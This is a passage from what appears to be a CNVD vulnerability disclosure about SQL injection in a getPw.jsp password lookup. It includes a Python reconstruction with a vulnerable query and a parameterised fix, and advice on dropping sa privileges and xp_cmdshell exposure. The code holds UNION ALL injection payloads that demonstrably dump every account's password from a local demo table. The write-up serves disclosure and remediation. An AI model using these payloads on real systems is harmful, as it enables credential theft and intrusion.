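    con.executemany(
        "INSERT INTO v_save_password VALUES (?,?,?,?,?,?,?,?,?)",
        [
            ("13800000001", 0, "12 31 2014 12:58PM", 99, "888880001",
             "800000001", 9, None, "pw-one"),
            ("13800000002", 0, "01 02 2015 09:00AM", 12, "888880002",
             "800000002", 1, None, "pw-two"),
        ],
    )
    return con


def lookup_vulnerable(con, zgyhzh, sjhm):
    """Hypothetical reconstruction of how getPw.jsp builds its query:
    the POST values are concatenated straight into the SQL text."""
    sql = ("SELECT * FROM v_save_password WHERE zgyhzh='" + zgyhzh
           + "' AND sjhm='" + sjhm + "'")
    return con.execute(sql).fetchall()


def lookup_fixed(con, zgyhzh, sjhm):
    """Same lookup with bound parameters: the driver sends the values
    separately from the statement, so quotes and UNION are just data."""
    sql = "SELECT * FROM v_save_password WHERE zgyhzh=? AND sjhm=?"
    return con.execute(sql, (zgyhzh, sjhm)).fetchall()


# Same shape as sqlmap's first payload: close the quote, append a
# 9-column UNION ALL, comment out the rest.  sqlmap spelled its marker as
# CHAR(113)+CHAR(119)+... (SQL Server syntax); a plain literal is used here.
UNION_MARKER = ("1' UNION ALL SELECT NULL,NULL,'qwvnq-marker-qyjlq',"
                "NULL,NULL,NULL,NULL,NULL,NULL-- ")

# The step that dumps the view: route the password column through the
# third slot of the UNION, one row per account.
UNION_DUMP = ("1' UNION ALL SELECT NULL,NULL,password,NULL,NULL,NULL,"
              "NULL,NULL,NULL FROM v_save_password-- ")


def marker_reflected(con):
    """True when the marker comes back in column 3, i.e. the UNION ran."""
    rows = lookup_vulnerable(con, UNION_MARKER, "3")
    return any(r[2] == "qwvnq-marker-qyjlq" for r in rows)


def dumped_passwords(con):
    """Every account's password, leaked through the concatenated query."""
    return sorted(r[2] for r in lookup_vulnerable(con, UNION_DUMP, "3"))


def fixed_rows_for_payload(con):
    """The same payload against the parameterised query matches nothing:
    no account has that literal string as its zgyhzh."""
    return lookup_fixed(con, UNION_DUMP, "3")


if __name__ == "__main__":
    db = make_db()
    print("marker reflected:", marker_reflected(db))        # True
    print("passwords leaked:", dumped_passwords(db))        # ['pw-one', 'pw-two']
    print("fixed query rows:", fixed_rows_for_payload(db))  # []
```

Parameterisation closes the injection itself; the second half of the recommendation, changing privileges, addresses what the log shows after it. The application connects as sa, which is why xp_cmdshell was usable: on SQL Server 2000 that procedure is callable by sysadmin members by default. A dedicated login holding only SELECT on the lookup view would have confined even an unfixed injection to that view's data instead of an OS shell on the database host.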
CNVD confirmed and reproduced the described situation; it has been forwarded through CNCERT to the Anhui branch centre, which will coordinate handling with the unit that administers the website.
None yet.